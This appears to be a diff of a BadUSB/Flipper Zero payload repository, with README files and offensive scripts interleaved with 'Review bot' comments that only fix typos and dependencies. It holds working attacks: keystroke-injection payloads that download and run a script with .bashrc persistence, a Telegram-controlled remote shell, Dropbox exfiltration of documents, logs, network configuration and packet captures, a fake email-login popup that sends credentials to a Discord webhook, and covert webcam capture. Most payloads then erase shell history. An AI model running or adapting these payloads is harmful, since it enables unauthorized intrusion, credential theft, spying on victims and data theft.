- **Python Script**: Download, edit as you want and upload the python script somewhere you want and put the file link into the file payload.txt replacing the example link.
- **Persistence**: I preferred to create a mechanism that would allow you to create *some* persistence, not quite total, but you can have a high level of persistence. In this specific case, no permissions are needed, because it is sufficient to insert some lines in the .bashrc file that allow to keep the connection to Telegram open from the first time the user opens the terminal. Most of other mechanism needs the sudo permissions.
### Telegram Bot Guide
1. Search for `@botfather` in Telegram.
2. Start a conversation with BotFather by clicking on the Start button.
3. Type /newbot, and follow the prompts to set up a new bot.
4. Select and copy the Bot Token that you can see after the registration and past it into the `BOT_TOKEN` python variable that you find in the `connection.py` file at line 3.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
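Review bot: the Settings bullet and the Telegram Bot Guide disagree on where `BOT_TOKEN` lives ("line 4 ... line 3 comment" versus "at line 3"), and "Telegram bot ID" in the Settings bullet means the bot token, which is a secret credential rather than an identifier; use one term and refer to the variable name instead of line numbers, which go stale. Typos: "connesction", "trough", "outputing", "runned" should read "connection", "through", "outputting", "run".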
@@ -0,0 +1,11 @@
from telebot import TeleBot
# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)
@bot.message_handler(commands=['start'])
def send_welcome(message):
bot.reply_to(message, "Ok it works")
bot.infinity_polling()
@@ -0,0 +1,25 @@
REM #######################################################
REM # |
REM # Title : Telegram Persistent Connection Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN
curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
python3 connection.py &
fi" >> .bashrc; exit
END_STRINGLN
@@ -0,0 +1,49 @@
# Persistent Reverse Shell - Telegram Based
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Dependencies
* Internet Connection
## Description
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
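Review bot: the `## Dependencies` list is incomplete: the Python script imports `telebot` (the pyTelegramBotAPI package), which is not in the standard library and has to be installed with pip, and a Telegram bot token must be placed in `BOT_TOKEN`; neither is mentioned, only `* Internet Connection`. The Description also needs wording fixes: `trough` should be `through` (three occurrences), `for create the Telegram connection` should be `to create the Telegram connection`, `The script accept ... and split` should be `accepts ... splits`, and `a theoretically infinite chunk of 1000 characters` is clearer as `into chunks of at most 1000 characters`. The sentence about the size limit should say what the code actually does: it first replies `Message too long...` and then sends every chunk anyway.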
@@ -0,0 +1,43 @@
from telebot import TeleBot, types
import subprocess
# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)
commands = [
types.BotCommand("/reverse", "/reverse <shell_command>")
]
bot.set_my_commands(commands=commands)
@bot.message_handler(commands=['reverse'])
def reverse_shell(message):
command = extract_command(message.text)
if command != "":
print(f"Command received: {command}")
out = run_command(command)
if len(out) > 1000:
bot.reply_to(message, "Message too long...")
chunk_size = 1000
for i in range(0, len(out), chunk_size):
bot.send_message(message.chat.id, out[i:i+chunk_size])
else:
bot.reply_to(message, out)
def extract_command(message):
command_prefix = "/reverse"
if message.startswith(command_prefix):
return message[len(command_prefix):].strip()
else:
return None
def run_command(command):
try:
result = subprocess.check_output(command, shell=True, text=True)
return result.strip()
except subprocess.CalledProcessError as e:
return f"Some error: {e}"
bot.infinity_polling()
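Review bot: `extract_command` returns `None` when the text does not start with `/reverse`, but the caller only tests `if command != "":`, so the two functions disagree on their sentinel; use one convention (return `""` in both branches, or test `if command:`). The reply `Message too long...` in the `len(out) > 1000` branch is misleading, because the loop immediately below sends the complete output in chunks; reword it to say the output follows in parts. The comment `# Set here the Telegram bot token` should also say the token is a secret and must not be committed to the repository.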
@@ -0,0 +1,25 @@
REM ############################################################
REM # #
REM # Title : Persistent Reverse Shell - Telegram Based #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ############################################################
REM Requirements:
REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN_BLOCK
curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
python3 connection.py &
fi" >> .bashrc; exit
END_STRINGLN
@@ -0,0 +1,56 @@
# Exfiltrate Linux Content With Dropbox
A script used to close all target open applications.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltration
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate folder content on Linux Systems.
Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Settings
* Set your dropbox access token
* Set the folder path interessed (i.e. /Documents)
* Change (if you think that it is necessary) the delay of the zipping operation
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
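Review bot: the tagline under the title, `A script used to close all target open applications.`, was copied from another payload and contradicts the `## Description` section; replace it with the exfiltration sentence used there. Further down, `shel` should be `shell`, `interessed` should be `of interest`, `i.e. /Documents` should be `e.g. /Documents`, and the item `* * Terminal that can be opened by the shortcommand CTRL-ALT t` renders as a bullet containing a literal asterisk; indent it under `* Linux System` instead and spell `shortcut`. The `zip` utility the payload relies on is also missing from Dependencies.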
@@ -0,0 +1,21 @@
#!/bin/sh
# Set the access token for Dropbox API
ACCESS_TOKEN=""
# User name
NAME=$(whoami)
# Set the file path and name
FILE_PATH="/home/$NAME/Documents/files.zip"
FILE_NAME="files.zip"
# Set the Dropbox folder path
DROPBOX_FOLDER="/Stolen"
# Upload the file to Dropbox
curl -X POST https://content.dropboxapi.com/2/files/upload \
--header "Authorization: Bearer $ACCESS_TOKEN" \
--header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER/$FILE_NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \
--header "Content-Type: application/octet-stream" \
--data-binary "@$FILE_PATH"
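Review bot: this helper script is not mentioned anywhere in the README and diverges from the payload beside it: it uploads a fixed `/home/$NAME/Documents/files.zip` into `/Stolen`, whereas the payload builds a random zip name and uploads it to `/$NAME`. Either document what the script is for or drop it; as it stands a reader cannot tell which flow is authoritative. The `ACCESS_TOKEN=""` placeholder is a bearer token, so a comment should state that a real value must never be committed.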
@@ -0,0 +1,76 @@
REM #########################################################
REM # |
REM # Title : Exfiltrate Linux Content With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
STRING ACCESS_TOKEN="YOUR_TOKEN"
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
DELAY 500
STRING path="/home/$USER_NAME/Documents"
ENTER
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$path/$NAME"
ENTER
DELAY 500
REM The FOLDER that you want to zip, in this example you want to zip all Documents content
STRING FOLDER="/home/$USER_NAME/Documents/"
ENTER
REM Delay for zipping operation, it depends by computer power and folder directory
DELAY 10000
DELAY 500
STRING if [ -r "$FOLDER" ]; then
ENTER
STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
ENTER
STRING else
ENTER
STRING echo ""
ENTER
STRING fi
ENTER
DELAY 500
STRING DROPBOX_FOLDER="/$NAME"
ENTER
DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000
STRING history -c
ENTER
@@ -0,0 +1,54 @@
# Exfiltrate Email And Password By Phising - Linux ✅
A script used to exfiltrate the email and the email password by a popup phishing based on linux systems.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Phishing, Credentials
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Description
A script used to exfiltrate the email and the email password by a popup phishing based on linux systems.
Opens a shell, get the email and the email password by a popup, send the input to a Discord webhook.
## Getting Started
### Dependencies
* Internet Connection
### Settings
* Set the Discord webhook
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
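Review bot: Dependencies lists only `* Internet Connection`, but the payload depends on `kdialog` (KDE's dialog tool) for the popups and on `curl` for the webhook call; `kdialog` is absent on non-KDE desktops, so document it. Spelling: `Phising` in the title should be `Phishing` (the category line already has it right), and `a popup phishing based on linux systems` reads better as `a phishing popup on Linux systems`. The first Description line repeats the tagline word for word; one copy is enough.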
@@ -0,0 +1,31 @@
REM ###########################################################
REM # |
REM # Title : Exfiltrate Email And Password By Phising |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Phishing |
REM # Target : Linux |
REM # |
REM ###########################################################
REM Requirements:
REM - Internet Connection
REM - Discord webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### POPUP SECTION ####
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
STRING WEBHOOK_URL="example.com"
ENTER
DELAY 500
REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit;
ENTER
@@ -0,0 +1,57 @@
# Exfiltrate Linux Log Files - BadUSB ✅
A script used to exfiltrate linux logs.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltration
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate linux logs.
Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Settings
* Set your dropbox access token
* Change if needed the folder path interessed (i.e. /var/log)
* Change (if you think that it is necessary) the delay of the zipping operation
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
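Review bot: the same wording problems as in the Documents payload README recur here: `shel` should be `shell`, `interessed` should be `of interest`, `i.e. /var/log` should be `e.g. /var/log`, and the `* * Terminal ...` item renders a literal asterisk instead of a nested bullet. Dependencies should also name `zip`, and the title `Exfiltrate Linux Log Files - BadUSB` does not match the payload header `Exfiltrate Linux Logs With Dropbox`; use one name in both places.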
@@ -0,0 +1,73 @@
REM ######################################################
REM # |
REM # Title : Exfiltrate Linux Logs With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
STRING ACCESS_TOKEN="YOUR_TOKEN"
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
REM Create random num
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER
REM Zip path
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER
REM Default log path
DELAY 500
STRING LOG_PATH="/var/log/"
ENTER
DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME"
ENTER
REM Send to Dropbox function
DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM Send timing - it depends
DELAY 5000
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
@@ -0,0 +1,53 @@
# Exfiltrate Network Configuration - BadUSB ✅
A script used to exfiltrate the network configuration on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltrate, Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the network configuration on a Linux machine.
Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
### Settings
* Set the Dropbox token
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
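Review bot: the Description line `Opens a shell, get the network card name, get the network configuration using nmcli, ...` was copied from the network-traffic README; this payload never looks up a card name, it only runs `nmcli`, `nmcli connection show` and `nmcli device show`, so rewrite the sentence to match. Category is `Exfiltrate, Execution` here and `Exfiltration, Execution` in the payload header; pick one spelling across the repository. Dependencies should also list `nmcli` (NetworkManager) and `zip`.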
@@ -0,0 +1,85 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
REM DELAY 500
REM STRING USER_NAME=$(whoami)
REM ENTER
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
ENTER
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
ENTER
DELAY 1000
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
ENTER
DELAY 1000
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
ENTER
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
STRING DROPBOX_FOLDER="/$NAME"
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000
STRING history -c
ENTER
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
@@ -0,0 +1,53 @@
# Exfiltrate Network Traffic - Linux ✅
A script used to exfiltrate the network traffic on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltrate
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the network traffic on a Linux machine.
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Permissions
* Internet Connection
### Settings
* Set the Dropbox token
* Set the sniffing filter
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
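Review bot: `* Permissions` under Dependencies is too vague: `tcpdump` needs root (the payload runs `sudo su`), so say `root / sudo password` and list `tcpdump` itself, which is not installed by default on many distributions. The category line uses `Exfiltrate` while the payload header says `Exfiltration`; align them. The tagline and the first Description sentence are duplicates.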
@@ -0,0 +1,119 @@
REM #############################################
REM # |
REM # Title : Exfiltrate Network Traffic |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #############################################
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM REQUIRED: Set what you want to sniff, for example tcp port 80
DEFINE SNIFFING example
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
DEFINE TOKEN example
REM Just a Dropbox const
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
REM Output file path packets.pcap, remember to use pcap extension
DEFINE FILE example.pcap
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### Network Traffic SECTION ####
STRING FILE_PATH="
STRING FILE
STRING "
ENTER
DELAY 500
STRING filter_expression="
STRING SNIFFING
STRING "
ENTER
DELAY 500
REM Network card name
STRING net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
ENTER
DELAY 500
REM Network dump
STRING tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
ENTER
DELAY 500
REM Get PID
STRING tcpdump_pid=$!
ENTER
REM Set how long you want to sniff
DELAY 60000
REM Kill the process by PID
STRING kill $tcpdump_pid
ENTER
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING DROPBOX_FOLDER="/Exfiltration"
ENTER
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
ENTER
REM #### REMOVE TRACES ####
STRING rm "$FILE_PATH"
ENTER
DELAY 500
STRING history -c
ENTER
DELAY 500
REM Exit from Sudo user
STRING exit
ENTER
DELAY 500
REM Close the shell
STRING exit
ENTER
@@ -0,0 +1,12 @@
#!/bin/bash
filter_expression="tcp port 80"
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
tcpdump_pid=$!
sleep 60
kill $tcpdump_pid
@@ -0,0 +1,50 @@
# Exfiltrate Photos Through Shell - Linux ✅
A script used to exfiltrate photos using fswebcam shell command.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltration
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate photos using fswebcam shell command. The permissions is needed for give the executation permission to the script downloaded.
## Getting Started
### Dependencies
* An internet connection
* Linux system
### Settings
* Dropbox Token - You should change it into the script.sh file, line 7.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
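Review bot: the Description sentence `The permissions is needed for give the executation permission to the script downloaded.` should read `Root permissions are needed to install fswebcam and to make the downloaded script executable`, which is what the payload's REM header already states; Dependencies should then list the sudo password alongside `fswebcam` and `curl`. The `line 7` reference in Settings is fragile; point to the `TOKEN=your_dropbox_token` assignment by name instead, and give the `SCRIPT-SH-LINK` placeholder its own Settings entry.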
@@ -0,0 +1,52 @@
REM ##################################################
REM # |
REM # Title : Exfiltrate Photos Through Shell |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##################################################
REM Requirements:
REM - EXFILTRATION:
REM - Internet Connection
REM - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..)
REM - PERMISSIONS:
REM - for install 'fswebcam'
REM - for script.sh permission
REM REQUIRED - replace example.com with your script.sh link
DEFINE SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
DEFINE SUDO-PSWD example
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING sudo apt install fswebcam -y
ENTER
DELAY 500
STRING SUDO-PSWD
ENTER
DELAY 5000
REM #### Script ####
STRING curl
STRING SCRIPT-SH-LINK
STRING > script.sh
ENTER
DELAY 4000
STRING sudo chmod +x script.sh
ENTER
DELAY 500
STRING nohup ./script.sh > /dev/null 2>&1 & exit
ENTER
@@ -0,0 +1,32 @@
#!/bin/bash
USER=$(whoami)
DIR=/home/$USER/tmp
TOKEN=your_dropbox_token
mkdir -p $DIR
function remove_folder {
rm -rf "$DIR"
rm -rf "/home/$USER/script.sh"
}
trap remove_folder EXIT
# execute the for, for some times..
for i in {1..10}
do
NAME=$(date +%s%N).jpg
fswebcam --no-banner $DIR/$NAME
curl -X POST https://content.dropboxapi.com/2/files/upload \
--header "Authorization: Bearer $TOKEN" \
--header "Dropbox-API-Arg: {\"path\": \"/$NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \
--header "Content-Type: application/octet-stream" \
--data-binary @$DIR/$NAME
sleep 60
done
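Review bot: the comment `# execute the for, for some times..` does not describe the loop; say that it captures ten frames one minute apart (`for i in {1..10}` with `sleep 60`). The `TOKEN=your_dropbox_token` line holds a bearer token and deserves a comment that a real value must not be committed.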
@@ -0,0 +1,53 @@
# Exfiltrate Process Info - Linux ✅
A script used to exfiltrate the process info on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltration
<div align=center>
